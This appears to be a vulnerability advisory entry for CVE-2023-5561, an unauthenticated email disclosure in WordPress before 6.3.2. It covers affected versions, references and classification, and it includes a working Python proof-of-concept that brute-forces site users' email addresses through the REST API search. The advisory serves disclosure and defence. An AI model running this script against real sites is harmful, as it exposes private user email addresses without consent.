WP < 6.3.2 – Unauthenticated Post Author Email Disclosure | CVE 2023-5561

Description

WordPress does not properly restrict which user fields are searchable via the REST API.

Proof of Concept

from multiprocessing import Pool
import requests
import string
import json
import sys


if len(sys.argv) != 2:
	print(f'USAGE: {sys.argv[0]} <target site root url>')
	sys.exit()

url = sys.argv[1].rstrip('/') + '/wp-json/wp/v2/users'

known_users = {}
user_suffixes = []
current_suffix = '@'
headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136' }

def bruteforce_search(txt):
	users = json.loads(requests.get(url, headers=headers, data=json.dumps({'search':txt})).text)
	return (txt, users)



if __name__ == '__main__':
	# String comparisons in the DB are case-insensitive, so don't bother with uppercase letters
	dic = string.ascii_lowercase + string.digits + '!#$&\'+\/=?^_`{|}~\.-]+'
	p = Pool(16)

	users = json.loads(requests.get(url).text)

	# Initial round: Grab all users by their first email domain's character
	suffixes = [current_suffix + c for c in dic]

	for suffix, users in p.imap(bruteforce_search, suffixes):
		if len(users) > 0:
			print(users)
			for user in users:
				slug = user['slug']
				print(f'# Added user: {slug}, suffix: {suffix}')
				known_users[user['slug']] = suffix

	# Iterate through all users
	for user in known_users:
		print(f'# Bruteforcing email domain for {user}..')
		foundSomething = True
		while foundSomething:
			foundSomething = False
			suffixes = [known_users[user] + c for c in dic]
			for suffix, users_found in p.imap(bruteforce_search, suffixes):
				for user_found in users_found:
					if user_found['slug'] == user:
						print(suffix)
						known_users[user] = suffix
						foundSomething = True
						break

	for user in known_users:
		print(f'# Bruteforcing email ID for {user}..')
		foundSomething = True
		while foundSomething:
			foundSomething = False
			suffixes = [c + known_users[user] for c in dic]
			for suffix, users_found in p.imap(bruteforce_search, suffixes):
				for user_found in users_found:
					if user_found['slug'] == user:
						print(suffix)
						known_users[user] = suffix
						foundSomething = True
						break

	print('# Found the following:')
	for user in known_users:
		email = known_users[user]
		print(f'{user} => {email}')

Affects WordPress

6.3.1

Fixed in WordPress 6.3.2

6.3

Fixed in WordPress 6.3.2

6.2.2

Fixed in WordPress 6.2.3

6.2.1

Fixed in WordPress 6.2.3

6.2

Fixed in WordPress 6.2.3

6.1.3

Fixed in WordPress 6.1.4

6.1.2

Fixed in WordPress 6.1.4

6.1.1

Fixed in WordPress 6.1.4

6.1

Fixed in WordPress 6.1.4

6.0.5

Fixed in WordPress 6.0.6

6.0.4

Fixed in WordPress 6.0.6

6.0.3

Fixed in WordPress 6.0.6

6.0.2

Fixed in WordPress 6.0.6

6.0.1

Fixed in WordPress 6.0.6

6.0

Fixed in WordPress 6.0.6

5.9.7

Fixed in WordPress 5.9.8

5.9.6

Fixed in WordPress 5.9.8

5.9.5

Fixed in WordPress 5.9.8

5.9.4

Fixed in WordPress 5.9.8

5.9.3

Fixed in WordPress 5.9.8

5.9.2

Fixed in WordPress 5.9.8

5.9.1

Fixed in WordPress 5.9.8

5.9

Fixed in WordPress 5.9.8

5.8.7

Fixed in WordPress 5.8.8

5.8.6

Fixed in WordPress 5.8.8

5.8.5

Fixed in WordPress 5.8.8

5.8.4

Fixed in WordPress 5.8.8

5.8.3

Fixed in WordPress 5.8.8

5.8.2

Fixed in WordPress 5.8.8

5.8.1

Fixed in WordPress 5.8.8

5.8

Fixed in WordPress 5.8.8

5.7.9

Fixed in WordPress 5.7.10

5.7.8

Fixed in WordPress 5.7.10

5.7.7

Fixed in WordPress 5.7.10

5.7.6

Fixed in WordPress 5.7.10

5.7.5

Fixed in WordPress 5.7.10

5.7.4

Fixed in WordPress 5.7.10

5.7.3

Fixed in WordPress 5.7.10

5.7.2

Fixed in WordPress 5.7.10

5.7.1

Fixed in WordPress 5.7.10

5.7

Fixed in WordPress 5.7.10

5.6.11

Fixed in WordPress 5.6.12

5.6.10

Fixed in WordPress 5.6.12

5.6.9

Fixed in WordPress 5.6.12

5.6.8

Fixed in WordPress 5.6.12

5.6.7

Fixed in WordPress 5.6.12

5.6.6

Fixed in WordPress 5.6.12

5.6.5

Fixed in WordPress 5.6.12

5.6.4

Fixed in WordPress 5.6.12

5.6.3

Fixed in WordPress 5.6.12

5.6.2

Fixed in WordPress 5.6.12

5.6.1

Fixed in WordPress 5.6.12

5.6

Fixed in WordPress 5.6.12

5.5.12

Fixed in WordPress 5.5.13

5.5.11

Fixed in WordPress 5.5.13

5.5.10

Fixed in WordPress 5.5.13

5.5.9

Fixed in WordPress 5.5.13

5.5.8

Fixed in WordPress 5.5.13

5.5.7

Fixed in WordPress 5.5.13

5.5.6

Fixed in WordPress 5.5.13

5.5.5

Fixed in WordPress 5.5.13

5.5.4

Fixed in WordPress 5.5.13

5.5.3

Fixed in WordPress 5.5.13

5.5.2

Fixed in WordPress 5.5.13

5.5.1

Fixed in WordPress 5.5.13

5.5

Fixed in WordPress 5.5.13

5.4.13

Fixed in WordPress 5.4.14

5.4.12

Fixed in WordPress 5.4.14

5.4.11

Fixed in WordPress 5.4.14

5.4.10

Fixed in WordPress 5.4.14

5.4.9

Fixed in WordPress 5.4.14

5.4.8

Fixed in WordPress 5.4.14

5.4.7

Fixed in WordPress 5.4.14

5.4.6

Fixed in WordPress 5.4.14

5.4.5

Fixed in WordPress 5.4.14

5.4.4

Fixed in WordPress 5.4.14

5.4.3

Fixed in WordPress 5.4.14

5.4.2

Fixed in WordPress 5.4.14

5.4.1

Fixed in WordPress 5.4.14

5.4

Fixed in WordPress 5.4.14

5.3.15

Fixed in WordPress 5.3.16

5.3.14

Fixed in WordPress 5.3.16

5.3.13

Fixed in WordPress 5.3.16

5.3.12

Fixed in WordPress 5.3.16

5.3.11

Fixed in WordPress 5.3.16

5.3.10

Fixed in WordPress 5.3.16

5.3.9

Fixed in WordPress 5.3.16

5.3.8

Fixed in WordPress 5.3.16

5.3.7

Fixed in WordPress 5.3.16

5.3.6

Fixed in WordPress 5.3.16

5.3.5

Fixed in WordPress 5.3.16

5.3.4

Fixed in WordPress 5.3.16

5.3.3

Fixed in WordPress 5.3.16

5.3.2

Fixed in WordPress 5.3.16

5.3.1

Fixed in WordPress 5.3.16

5.3

Fixed in WordPress 5.3.16

5.2.18

Fixed in WordPress 5.2.19

5.2.17

Fixed in WordPress 5.2.19

5.2.16

Fixed in WordPress 5.2.19

5.2.15

Fixed in WordPress 5.2.19

5.2.14

Fixed in WordPress 5.2.19

5.2.13

Fixed in WordPress 5.2.19

5.2.12

Fixed in WordPress 5.2.19

5.2.11

Fixed in WordPress 5.2.19

5.2.10

Fixed in WordPress 5.2.19

5.2.9

Fixed in WordPress 5.2.19

5.2.8

Fixed in WordPress 5.2.19

5.2.7

Fixed in WordPress 5.2.19

5.2.6

Fixed in WordPress 5.2.19

5.2.5

Fixed in WordPress 5.2.19

5.2.4

Fixed in WordPress 5.2.19

5.2.3

Fixed in WordPress 5.2.19

5.2.2

Fixed in WordPress 5.2.19

5.2.1

Fixed in WordPress 5.2.19

5.2

Fixed in WordPress 5.2.19

5.1.16

Fixed in WordPress 5.1.17

5.1.15

Fixed in WordPress 5.1.17

5.1.14

Fixed in WordPress 5.1.17

5.1.13

Fixed in WordPress 5.1.17

5.1.12

Fixed in WordPress 5.1.17

5.1.11

Fixed in WordPress 5.1.17

5.1.10

Fixed in WordPress 5.1.17

5.1.9

Fixed in WordPress 5.1.17

5.1.8

Fixed in WordPress 5.1.17

5.1.7

Fixed in WordPress 5.1.17

5.1.6

Fixed in WordPress 5.1.17

5.1.5

Fixed in WordPress 5.1.17

5.1.4

Fixed in WordPress 5.1.17

5.1.3

Fixed in WordPress 5.1.17

5.1.2

Fixed in WordPress 5.1.17

5.1.1

Fixed in WordPress 5.1.17

5.1

Fixed in WordPress 5.1.17

5.0.19

Fixed in WordPress 5.0.20

5.0.18

Fixed in WordPress 5.0.20

5.0.17

Fixed in WordPress 5.0.20

5.0.16

Fixed in WordPress 5.0.20

5.0.15

Fixed in WordPress 5.0.20

5.0.14

Fixed in WordPress 5.0.20

5.0.13

Fixed in WordPress 5.0.20

5.0.12

Fixed in WordPress 5.0.20

5.0.11

Fixed in WordPress 5.0.20

5.0.10

Fixed in WordPress 5.0.20

5.0.9

Fixed in WordPress 5.0.20

5.0.8

Fixed in WordPress 5.0.20

5.0.7

Fixed in WordPress 5.0.20

5.0.6

Fixed in WordPress 5.0.20

5.0.5

Fixed in WordPress 5.0.20

5.0.4

Fixed in WordPress 5.0.20

5.0.3

Fixed in WordPress 5.0.20

5.0.2

Fixed in WordPress 5.0.20

5.0.1

Fixed in WordPress 5.0.20

5.0

Fixed in WordPress 5.0.20

4.9.23

Fixed in WordPress 4.9.24

4.9.22

Fixed in WordPress 4.9.24

4.9.21

Fixed in WordPress 4.9.24

4.9.20

Fixed in WordPress 4.9.24

4.9.19

Fixed in WordPress 4.9.24

4.9.18

Fixed in WordPress 4.9.24

4.9.17

Fixed in WordPress 4.9.24

4.9.16

Fixed in WordPress 4.9.24

4.9.15

Fixed in WordPress 4.9.24

4.9.14

Fixed in WordPress 4.9.24

4.9.13

Fixed in WordPress 4.9.24

4.9.12

Fixed in WordPress 4.9.24

4.9.11

Fixed in WordPress 4.9.24

4.9.10

Fixed in WordPress 4.9.24

4.9.9

Fixed in WordPress 4.9.24

4.9.8

Fixed in WordPress 4.9.24

4.9.7

Fixed in WordPress 4.9.24

4.9.6

Fixed in WordPress 4.9.24

4.9.5

Fixed in WordPress 4.9.24

4.9.4

Fixed in WordPress 4.9.24

4.9.3

Fixed in WordPress 4.9.24

4.9.2

Fixed in WordPress 4.9.24

4.9.1

Fixed in WordPress 4.9.24

4.9

Fixed in WordPress 4.9.24

4.8.22

Fixed in WordPress 4.8.23

4.8.21

Fixed in WordPress 4.8.23

4.8.20

Fixed in WordPress 4.8.23

4.8.19

Fixed in WordPress 4.8.23

4.8.18

Fixed in WordPress 4.8.23

4.8.17

Fixed in WordPress 4.8.23

4.8.16

Fixed in WordPress 4.8.23

4.8.15

Fixed in WordPress 4.8.23

4.8.14

Fixed in WordPress 4.8.23

4.8.13

Fixed in WordPress 4.8.23

4.8.12

Fixed in WordPress 4.8.23

4.8.11

Fixed in WordPress 4.8.23

4.8.10

Fixed in WordPress 4.8.23

4.8.9

Fixed in WordPress 4.8.23

4.8.8

Fixed in WordPress 4.8.23

4.8.7

Fixed in WordPress 4.8.23

4.8.6

Fixed in WordPress 4.8.23

4.8.5

Fixed in WordPress 4.8.23

4.8.4

Fixed in WordPress 4.8.23

4.8.3

Fixed in WordPress 4.8.23

4.8.2

Fixed in WordPress 4.8.23

4.8.1

Fixed in WordPress 4.8.23

4.8

Fixed in WordPress 4.8.23

4.7.26

Fixed in WordPress 4.7.27

4.7.25

Fixed in WordPress 4.7.27

4.7.24

Fixed in WordPress 4.7.27

4.7.23

Fixed in WordPress 4.7.27

4.7.22

Fixed in WordPress 4.7.27

4.7.21

Fixed in WordPress 4.7.27

4.7.20

Fixed in WordPress 4.7.27

4.7.19

Fixed in WordPress 4.7.27

4.7.18

Fixed in WordPress 4.7.27

4.7.17

Fixed in WordPress 4.7.27

4.7.16

Fixed in WordPress 4.7.27

4.7.15

Fixed in WordPress 4.7.27

4.7.14

Fixed in WordPress 4.7.27

4.7.13

Fixed in WordPress 4.7.27

4.7.12

Fixed in WordPress 4.7.27

4.7.11

Fixed in WordPress 4.7.27

4.7.10

Fixed in WordPress 4.7.27

4.7.9

Fixed in WordPress 4.7.27

4.7.8

Fixed in WordPress 4.7.27

4.7.7

Fixed in WordPress 4.7.27

4.7.6

Fixed in WordPress 4.7.27

4.7.5

Fixed in WordPress 4.7.27

4.7.4

Fixed in WordPress 4.7.27

4.7.3

Fixed in WordPress 4.7.27

4.7.2

Fixed in WordPress 4.7.27

4.7.1

Fixed in WordPress 4.7.27

4.7

Fixed in WordPress 4.7.27

References

CVE

CVE-2023-5561

URL

https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/

URL

https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CWE-200

CVSS

5.3 (medium)

Miscellaneous

Original Researcher

Marc Montpas

Submitter

Marc Montpas

Submitter website

https://wpscan.com

Submitter twitter

marcS0H

Verified

Yes

WPVDB ID

19380917-4c27-4095-abf1-eba6f913b441

Timeline

Publicly Published

2023-10-12 (about 2 years ago)

Added

2023-10-13 (about 2 years ago)

Last Updated

2023-10-13 (about 2 years ago)

Other

Published

Title

Published

2024-03-20

Title

Avada < 7.11.7 - Unauthenticated Sensitive Information Exposure via Form Uploads Directory Listing

Published

2022-03-22

Title

Ninja Forms < 3.6.8-wp - Unauthenticated Email Address Disclosure

Published

2025-09-22

Title

Upcoming Events Lists <= 1.4.0 - Authenticated (Subscriber+) Insecure Direct Object Reference

Published

2025-03-07

Title

WP-Recall – Registration, Profile, Commerce & More < 16.26.12 - Authenticated (Contributor+) Protected Post Disclosure

Published

2025-04-11

Title

Developer Toolbar <= 1.0.3 - Unauthenticated Information Exposure